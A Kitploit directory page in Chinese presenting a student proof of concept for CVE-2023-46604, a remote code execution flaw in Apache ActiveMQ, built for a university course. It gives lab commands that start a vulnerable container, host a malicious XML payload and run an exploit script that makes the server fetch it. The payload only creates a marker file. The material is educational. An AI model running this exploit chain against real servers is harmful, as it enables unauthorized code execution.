Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SSP-Assignment-3-RCEYouLater — 一个为UPB高级网络安全硕士课程SPS班级编写的CVE-2023-46604概念验证。 | Kitploit
工具/GitHubGitHub/rockydesigne/ssp-assignment-3-rceyoulater
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubrockydesigne/ssp-assignment-3-rceyoulater

SSP-Assignment-3-RCEYouLater

一个为UPB高级网络安全硕士课程SPS班级编写的CVE-2023-46604概念验证。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
228个月前尚未审核

CVE-2023-46604: Apache ActiveMQ RCE 概念验证

作业: SSP 作业 3 团队: RCE You Later 成员: Banica Horia Alexandru, Comarlau Vlad-Constantin

使用此仓库进行 PoC 的视频链接: https://www.youtube.com/watch?v=vum4qTF4ygU

🚨 概述

此仓库包含针对 CVE-2023-46604 的完整功能概念验证 (PoC)。 该漏洞允许攻击者通过强制易受攻击的 Apache ActiveMQ 服务器(版本 5.15.10)反序列化恶意 XML 配置文件,从而在其上执行任意 shell 命令。

目标: 在受害服务器内创建一个名为 pwned_by_ssp_team 的文件,以证明我们拥有控制权。


🛠️ 先决条件

在运行利用之前,请确保您具备:

  1. Docker 和 Docker Compose(已安装并正在运行)
  2. Python 3

📂 仓库结构

  • vulnerable-env/:包含受害服务器的 Docker 配置。
  • attacker/:包含利用脚本和恶意负载。
    • exploit.py:发送恶意数据包的 Python 脚本。
    • serve.py:用于托管 XML 负载的简单 HTTP 服务器。
    • poc.xml:包含命令 touch /tmp/pwned_by_ssp_team 的恶意配置文件。

🚀 分步使用指南

第 1 步:启动受害者(ActiveMQ)

我们将使用 Docker 运行一个旧的、易受攻击的 ActiveMQ 版本。

  1. 打开一个终端。
  2. 导航到 vulnerable-env 文件夹:
    root@kitploit:~
    cd vulnerable-env
    
  3. 启动容器:
    root@kitploit:~
    docker-compose up -d
    
  4. 等待 30 秒,让服务器完全启动。

第 2 步:托管恶意 XML

受害服务器需要从我们这里下载指令。我们将设置一个小型 Web 服务器来托管这些指令。

  1. 打开第二个终端。
  2. 导航到 attacker 文件夹:
    root@kitploit:~
    cd attacker
    
  3. 启动 Python Web 服务器:
    root@kitploit:~
    python3 serve.py
    
    保持此终端打开!您应该会看到 "在 0.0.0.0 端口 8000 上提供 HTTP 服务..."

第 3 步:启动利用

现在我们将发送触发漏洞的特定网络数据包。

  1. 打开第三个终端。

  2. 导航到 attacker 文件夹:

    root@kitploit:~
    cd attacker
    
  3. 运行利用脚本。

    • 注意: 如果您使用的是 macOS 或 Windows,请完全按照如下命令使用。
    root@kitploit:~
    python3 exploit.py -i 127.0.0.1 -p 61616 -u http://host.docker.internal:8000/poc.xml
    
    • Linux 用户: 如果您使用的是 Linux,请将 host.docker.internal 替换为网络桥接的网关地址,通常为:172.17.0.1。如果指定的地址无效,请尝试通过以下方式获取地址:docker network inspect bridge -f '{{range .IPAM.Config}}{{.Gateway}}{{end}}'

第 4 步:验证攻击

是否成功?让我们检查文件是否在容器内被创建。

  1. 返回您的第一个终端(或任何终端)。
  2. 运行以下命令检查受害者容器内的 /tmp 文件夹:
    root@kitploit:~
    docker exec activemq-victim ls -l /tmp
    
  3. 成功: 您应该会看到一个名为 pwned_by_ssp_team 的文件。

🧹 清理

要停止并移除易受攻击的容器:

root@kitploit:~
cd vulnerable-env
docker-compose down
下载工具